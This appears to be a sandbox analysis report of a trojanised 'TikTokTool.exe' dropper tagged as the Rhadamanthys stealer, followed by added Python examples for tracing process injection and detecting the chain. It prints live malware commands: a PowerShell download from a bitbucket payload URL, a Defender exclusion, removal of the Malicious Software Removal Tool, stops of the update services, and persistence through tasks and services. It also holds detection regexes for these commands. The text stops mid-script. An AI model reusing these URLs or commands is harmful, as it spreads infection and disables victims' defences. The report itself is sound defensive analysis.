Analysis
- max time kernel: 39s
- max time network: 42s
- platform: windows10-2004_x64
- resource: win10v2004-20240611-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 15-06-2024 14:22
-
Static task: static1
Behavioral task: behavioral1
- Sample: TikTokTool.exe
- Resource: win7-20240611-en
Behavioral task: behavioral2
- Sample: TikTokTool.exe
- Resource: win10v2004-20240611-en
General
- Target: TikTokTool.exe
- Size: 7KB
- MD5: b5e479d3926b22b59926050c29c4e761
- SHA1: a456cc6993d12abe6c44f2d453d7ae5da2029e24
- SHA256: fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
- SHA512: 09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
- SSDEEP: 192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio
Malware Config
Extracted
- https://rentry.org/lem61111111111/raw
- https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
  description | pid | process | target process
  PID 5776 created 3064 | 5776 | xaa22oqf.pc41.exe | sihost.exe
-
Blocklisted process makes network request 4 IoCs
Processes:
  flow | pid | process
  2 | 2552 | powershell.exe
  4 | 2552 | powershell.exe
  24 | 4720 | powershell.exe
  25 | 1116 | powershell.exe
-
Command and Scripting Interpreter: PowerShell 4 IoCs
Processes:
  pid | process
  2552 | powershell.exe
  1116 | powershell.exe
  4720 | powershell.exe
  5800 | powershell.exe
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | TikTokTool.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | xaa22oqf.pc40.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | xaa22oqf.pc43.exe
-
Executes dropped EXE 4 IoCs
Processes:
  pid | process
  5748 | xaa22oqf.pc40.exe
  5776 | xaa22oqf.pc41.exe
  552 | xaa22oqf.pc42.exe
  2524 | xaa22oqf.pc43.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Drops file in System32 directory 4 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\MRT.exe | xaa22oqf.pc42.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Setup.evtx | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
  description | pid | process | target process
  PID 552 set thread context of 2832 | 552 | xaa22oqf.pc42.exe | dialer.exe
-
Launches sc.exe 7 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | process
  4780 | sc.exe
  4484 | sc.exe
  2968 | sc.exe
  4596 | sc.exe
  2196 | sc.exe
  336 | sc.exe
  2652 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 45 IoCs
Processes (pid | process | rows recorded):
  2552 | powershell.exe | 2
  4720 | powershell.exe | 2
  1116 | powershell.exe | 2
  5776 | xaa22oqf.pc41.exe | 2
  2380 | dialer.exe | 4
  552 | xaa22oqf.pc42.exe | 14
  5800 | powershell.exe | 2
  2832 | dialer.exe | 17
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
  token | pid | process
  SeDebugPrivilege | 2552 | powershell.exe
  SeDebugPrivilege | 4720 | powershell.exe
  SeDebugPrivilege | 1116 | powershell.exe
  SeDebugPrivilege | 5800 | powershell.exe
  SeDebugPrivilege | 552 | xaa22oqf.pc42.exe
  SeDebugPrivilege | 2832 | dialer.exe
  SeShutdownPrivilege | 1020 | powercfg.exe
  SeCreatePagefilePrivilege | 1020 | powercfg.exe
  SeShutdownPrivilege | 3008 | powercfg.exe
  SeCreatePagefilePrivilege | 3008 | powercfg.exe
  SeShutdownPrivilege | 4652 | powercfg.exe
  SeCreatePagefilePrivilege | 4652 | powercfg.exe
  SeShutdownPrivilege | 2404 | powercfg.exe
  SeCreatePagefilePrivilege | 2404 | powercfg.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (writer pid | writer | target pid | target | rows recorded):
  4052 | TikTokTool.exe | 2552 | powershell.exe | 2
  2552 | powershell.exe | 5748 | xaa22oqf.pc40.exe | 3
  2552 | powershell.exe | 5776 | xaa22oqf.pc41.exe | 3
  2552 | powershell.exe | 552 | xaa22oqf.pc42.exe | 2
  2552 | powershell.exe | 2524 | xaa22oqf.pc43.exe | 3
  5748 | xaa22oqf.pc40.exe | 2312 | cmd.exe | 2
  2524 | xaa22oqf.pc43.exe | 1564 | cmd.exe | 2
  2312 | cmd.exe | 5604 | chcp.com | 2
  1564 | cmd.exe | 5952 | where.exe | 2
  2312 | cmd.exe | 5656 | findstr.exe | 2
  2312 | cmd.exe | 5668 | findstr.exe | 2
  1564 | cmd.exe | 4720 | powershell.exe | 2
  2312 | cmd.exe | 1784 | findstr.exe | 2
  2312 | cmd.exe | 1620 | schtasks.exe | 2
  2312 | cmd.exe | 3764 | schtasks.exe | 2
  2312 | cmd.exe | 5472 | cmd.exe | 2
  5472 | cmd.exe | 1292 | reg.exe | 2
  2312 | cmd.exe | 5448 | cmd.exe | 2
  5448 | cmd.exe | 5356 | reg.exe | 2
  2312 | cmd.exe | 1116 | powershell.exe | 2
  5776 | xaa22oqf.pc41.exe | 2380 | dialer.exe | 5
  832 | cmd.exe | 2724 | wusa.exe | 2
  552 | xaa22oqf.pc42.exe | 2832 | dialer.exe | 7
  2832 | dialer.exe | 616 | winlogon.exe | 1
  2832 | dialer.exe | 664 | lsass.exe | 1
  2832 | dialer.exe | 952 | svchost.exe | 1
  2832 | dialer.exe | 380 | dwm.exe | 1
  2832 | dialer.exe | 744 | svchost.exe | 1
  2832 | dialer.exe | 1048 | svchost.exe | 1
  2832 | dialer.exe | 1076 | svchost.exe | 1
-
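The WriteProcessMemory rows are the part of this report that reconstructs the chain: the sample writes into PowerShell, PowerShell into the four dropped executables, xaa22oqf.pc42.exe into dialer.exe, and dialer.exe (PID 2832) into winlogon.exe, lsass.exe, dwm.exe and several svchost.exe instances. The table shows 64 rows; the memory dumps listed under Downloads show a 172KB region at 0x140000000 in dialer.exe 2832 and 172KB regions in every one of those targets plus PIDs 1084, 1224, 1256 and 1344, consistent with the same payload being written into each of them. The following is an added example, not part of the sandbox report: it parses the export's flattened row format from a constructed subset of the rows above, counts writes per edge, flags writes into protected system images, and walks the writer graph back from an injected process to the initial sample. The PROTECTED set and the sample rows are the example's own assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: a subset of the "Suspicious use of WriteProcessMemory" rows
# from the report, in the flattened one-row-per-line form the export uses.
SAMPLE = """
PID 4052 wrote to memory of 2552 4052 TikTokTool.exe powershell.exe
PID 2552 wrote to memory of 552 2552 powershell.exe xaa22oqf.pc42.exe
PID 552 wrote to memory of 2832 552 xaa22oqf.pc42.exe dialer.exe
PID 552 wrote to memory of 2832 552 xaa22oqf.pc42.exe dialer.exe
PID 2832 wrote to memory of 616 2832 dialer.exe winlogon.exe
PID 2832 wrote to memory of 664 2832 dialer.exe lsass.exe
PID 2832 wrote to memory of 952 2832 dialer.exe svchost.exe
PID 2832 wrote to memory of 380 2832 dialer.exe dwm.exe
"""

# Row layout: "PID <src> wrote to memory of <dst> <src> <src image> <dst image>".
# The back-reference (?P=src) rejects rows where the repeated pid does not match.
ROW = re.compile(
    r"PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) (?P=src) (?P<src_img>\S+) (?P<dst_img>\S+)"
)

# Images that user-mode software has no business writing into (assumed list).
PROTECTED = {"winlogon.exe", "lsass.exe", "csrss.exe", "services.exe", "svchost.exe", "dwm.exe"}


def parse_wpm(text):
    """One (src_pid, src_img, dst_pid, dst_img) tuple per row. Duplicates are kept:
    the sandbox emits one row per WriteProcessMemory call, and the count matters."""
    return [(int(m["src"]), m["src_img"], int(m["dst"]), m["dst_img"]) for m in ROW.finditer(text)]


def write_edges(events):
    """Collapse repeated rows into (writer pid, writer, target pid, target) -> write count."""
    return Counter(events)


def flag_injection(events):
    """Rows whose target is a protected system image, i.e. cross-process injection."""
    return sorted({e for e in events if e[3].lower() in PROTECTED})


def injection_chain(events, pid):
    """Walk the writer graph upwards from pid (who wrote into the process that wrote
    into ...) until a process nobody wrote into; this recovers the drop chain."""
    writers = defaultdict(set)
    for src, src_img, dst, _ in events:
        writers[dst].add((src, src_img))
    chain, seen, cur = [], set(), pid
    while cur not in seen and writers.get(cur):
        seen.add(cur)
        src, src_img = min(writers[cur])  # deterministic choice if several writers
        chain.append((src, src_img))
        cur = src
    return chain


if __name__ == "__main__":
    ev = parse_wpm(SAMPLE)
    for edge, n in write_edges(ev).items():
        print(f"{n}x {edge}")
    for hit in flag_injection(ev):
        print("injection into", hit[3], hit[2], "chain:", injection_chain(ev, hit[2]))
```

Run against the full 64-row table the same way; the only change needed is the input string. A writer that appears in `flag_injection` but has no chain back to a user-dropped binary is the case to look at first, because it means the injector itself came from outside the recorded rows.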
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(one line per process: image | command line; indentation is the parent/child depth the report recorded; lines marked "*" are the signatures attributed to the process above them)

- C:\Windows\system32\winlogon.exe | winlogon.exe
  - C:\Windows\system32\dwm.exe | "dwm.exe"
- C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  * Drops file in System32 directory
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  - C:\Windows\system32\sihost.exe | sihost.exe
    - C:\Windows\SysWOW64\dialer.exe | "C:\Windows\system32\dialer.exe"
      * Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
- C:\Windows\sysmon.exe | C:\Windows\sysmon.exe
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE
  - C:\Users\Admin\AppData\Local\Temp\TikTokTool.exe | "C:\Users\Admin\AppData\Local\Temp\TikTokTool.exe"
    * Checks computer location settings
    * Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      * Blocklisted process makes network request
      * Command and Scripting Interpreter: PowerShell
      * Suspicious behavior: EnumeratesProcesses
      * Suspicious use of AdjustPrivilegeToken
      * Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe | "C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe"
        * Checks computer location settings
        * Executes dropped EXE
        * Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\51C9.tmp\51CA.tmp\51CB.bat C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe"
          * Suspicious use of WriteProcessMemory
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - C:\Windows\system32\chcp.com | chcp 1251
          - C:\Windows\system32\findstr.exe | findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
          - C:\Windows\system32\findstr.exe | findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
          - C:\Windows\system32\findstr.exe | findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
          - C:\Windows\system32\schtasks.exe | schtasks /query /tn "MyBatchScript"
          - C:\Windows\system32\schtasks.exe | schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
            * Creates scheduled task(s)
          - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
            * Suspicious use of WriteProcessMemory
            - C:\Windows\system32\reg.exe | reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
          - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
            * Suspicious use of WriteProcessMemory
            - C:\Windows\system32\reg.exe | reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
            * Blocklisted process makes network request
            * Command and Scripting Interpreter: PowerShell
            * Suspicious behavior: EnumeratesProcesses
            * Suspicious use of AdjustPrivilegeToken
      - C:\Users\Admin\AppData\Roaming\xaa22oqf.pc41.exe | "C:\Users\Admin\AppData\Roaming\xaa22oqf.pc41.exe"
        * Suspicious use of NtCreateUserProcessOtherParentProcess
        * Executes dropped EXE
        * Suspicious behavior: EnumeratesProcesses
        * Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Roaming\xaa22oqf.pc42.exe | "C:\Users\Admin\AppData\Roaming\xaa22oqf.pc42.exe"
        * Executes dropped EXE
        * Drops file in System32 directory
        * Suspicious use of SetThreadContext
        * Suspicious behavior: EnumeratesProcesses
        * Suspicious use of AdjustPrivilegeToken
        * Suspicious use of WriteProcessMemory
        - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          * Command and Scripting Interpreter: PowerShell
          * Suspicious behavior: EnumeratesProcesses
          * Suspicious use of AdjustPrivilegeToken
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          * Suspicious use of WriteProcessMemory
          - C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart
        - C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc
          * Launches sc.exe
        - C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc
          * Launches sc.exe
        - C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv
          * Launches sc.exe
        - C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits
          * Launches sc.exe
        - C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc
          * Launches sc.exe
        - C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          * Suspicious use of AdjustPrivilegeToken
        - C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          * Suspicious use of AdjustPrivilegeToken
        - C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          * Suspicious use of AdjustPrivilegeToken
        - C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          * Suspicious use of AdjustPrivilegeToken
        - C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe
          * Suspicious behavior: EnumeratesProcesses
          * Suspicious use of AdjustPrivilegeToken
          * Suspicious use of WriteProcessMemory
        - C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe delete "AAWUFTXN"
          * Launches sc.exe
        - C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
          * Launches sc.exe
      - C:\Users\Admin\AppData\Roaming\xaa22oqf.pc43.exe | "C:\Users\Admin\AppData\Roaming\xaa22oqf.pc43.exe"
        * Checks computer location settings
        * Executes dropped EXE
        * Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\52C3.tmp\52C4.tmp\52C5.bat C:\Users\Admin\AppData\Roaming\xaa22oqf.pc43.exe"
          * Suspicious use of WriteProcessMemory
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - C:\Windows\system32\where.exe | where node
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
            * Blocklisted process makes network request
            * Command and Scripting Interpreter: PowerShell
            * Suspicious behavior: EnumeratesProcesses
            * Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
- C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\system32\SppExtComObj.exe | C:\Windows\system32\SppExtComObj.exe -Embedding
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
- C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
- C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
- C:\Windows\system32\wbem\wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
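The subtree under xaa22oqf.pc42.exe is a loader hardening its foothold: a Defender exclusion for the user profile and ProgramData, removal of the Malicious Software Removal Tool update (KB890830, matching the write to C:\Windows\system32\MRT.exe), stops of the Windows Update, BITS and delivery-optimization services, sleep and hibernate timeouts set to zero, a hollowed dialer.exe (SetThreadContext plus WriteProcessMemory from PID 552), and a service whose binary lives under C:\ProgramData. Each step alone is a low-confidence alert; all of them under one root process is a signature. The family tag at the top is the sandbox's; nothing in the recorded behaviour is attributed to Rhadamanthys by the report itself. The following is an added example, not from the report or the sandbox: it runs constructed Sysmon-style process-creation events modelled on this tree through a small rule set and correlates the hits by root ancestor. Rule names, the PIDs the report does not state (Explorer, the individual sc.exe and powercfg.exe children, the benign control branch) and the rule thresholds are assumptions made for the example; the encoded PowerShell payload is left elided as on the page.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events modelled on the process tree
# above. Image paths and command lines are copied from the report; PIDs the report
# does not give (Explorer, the individual sc.exe/powercfg.exe children, and the
# benign control branch at the end) are made up. Layout: (pid, ppid, image, cmdline).
EVENTS = [
    (4052, 3000, r"C:\Users\Admin\AppData\Local\Temp\TikTokTool.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\TikTokTool.exe"'),
    (2552, 4052, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand ...'),
    (5748, 2552, r"C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe",
     r'"C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe"'),
    (2312, 5748, r"C:\Windows\system32\cmd.exe",
     r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\51C9.tmp\51CA.tmp\51CB.bat C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe"'),
    (5656, 2312, r"C:\Windows\system32\findstr.exe",
     r'findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"'),
    (3764, 2312, r"C:\Windows\system32\schtasks.exe",
     r'schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f'),
    (552, 2552, r"C:\Users\Admin\AppData\Roaming\xaa22oqf.pc42.exe",
     r'"C:\Users\Admin\AppData\Roaming\xaa22oqf.pc42.exe"'),
    (5800, 552, r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    (832, 552, r"C:\Windows\system32\cmd.exe", r"cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (2724, 832, r"C:\Windows\system32\wusa.exe", r"wusa /uninstall /kb:890830 /quiet /norestart"),
    (4780, 552, r"C:\Windows\system32\sc.exe", r"sc.exe stop WaaSMedicSvc"),
    (1020, 552, r"C:\Windows\system32\powercfg.exe", r"powercfg.exe /x -standby-timeout-ac 0"),
    (2832, 552, r"C:\Windows\system32\dialer.exe", r"C:\Windows\system32\dialer.exe"),
    (2652, 552, r"C:\Windows\system32\sc.exe",
     r'sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"'),
    # Benign control branch (constructed): an administrator querying a service from a console.
    (7000, 3000, r"C:\Windows\system32\cmd.exe", r'"C:\Windows\system32\cmd.exe"'),
    (7100, 7000, r"C:\Windows\system32\sc.exe", r"sc.exe query wuauserv"),
]

# Each rule: (name, regex on the image basename, regex on the command line).
RULES = [
    ("encoded_powershell", r"^powershell\.exe$", r"-EncodedCommand\b"),
    ("defender_exclusion", r"^powershell\.exe$", r"Add-MpPreference.*-Exclusion(Path|Extension|Process)"),
    ("msrt_uninstall", r"^wusa\.exe$", r"/uninstall\s+/kb:890830\b"),
    ("update_service_stop", r"^sc\.exe$", r"\bstop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b"),
    ("sleep_disabled", r"^powercfg\.exe$", r"/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b"),
    ("service_binary_in_programdata", r"^sc\.exe$", r'\bcreate\b.*binpath=\s*"?C:\\ProgramData\\'),
    ("logon_task_runs_script", r"^schtasks\.exe$",
     r"/create\b.*/tr\s.*AppData\\.*\.(vbs|js|bat|ps1)\b.*/sc\s+onlogon"),
    ("hosts_file_inspection", r"^findstr\.exe$", r"drivers\\etc\\hosts"),
]

# Signed Windows binaries this report shows being used as an injection host.
LOLBIN_HOSTS = {"dialer.exe"}
WINDOWS_DIR = "c:\\windows\\"


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def match_rules(event):
    """Names of the command-line rules that fire on one event."""
    _, _, image, cmd = event
    return [name for name, image_re, cmd_re in RULES
            if re.search(image_re, basename(image), re.I) and re.search(cmd_re, cmd, re.I)]


def parent_rule(event, by_pid):
    """A LOLBin host started by a parent living outside C:\\Windows (here the
    dropped xaa22oqf.pc42.exe in AppData spawning dialer.exe)."""
    _, ppid, image, _ = event
    parent = by_pid.get(ppid)
    if basename(image) in LOLBIN_HOSTS and parent and not parent[2].lower().startswith(WINDOWS_DIR):
        return ["lolbin_spawned_from_user_dir"]
    return []


def root_of(pid, by_pid):
    """Follow ppid links up to the first ancestor whose parent is not in the log."""
    while pid in by_pid and by_pid[pid][1] in by_pid:
        pid = by_pid[pid][1]
    return pid


def correlate(events, min_rules=3):
    """Attribute every hit to its root ancestor and report roots showing at least
    min_rules distinct behaviours, so the chain is triaged as one incident rather
    than a handful of unrelated low-severity alerts."""
    by_pid = {ev[0]: ev for ev in events}
    hits = defaultdict(set)
    for ev in events:
        for name in match_rules(ev) + parent_rule(ev, by_pid):
            hits[root_of(ev[0], by_pid)].add(name)
    return {root: sorted(names) for root, names in hits.items() if len(names) >= min_rules}


if __name__ == "__main__":
    by_pid = {ev[0]: ev for ev in EVENTS}
    for root, names in correlate(EVENTS).items():
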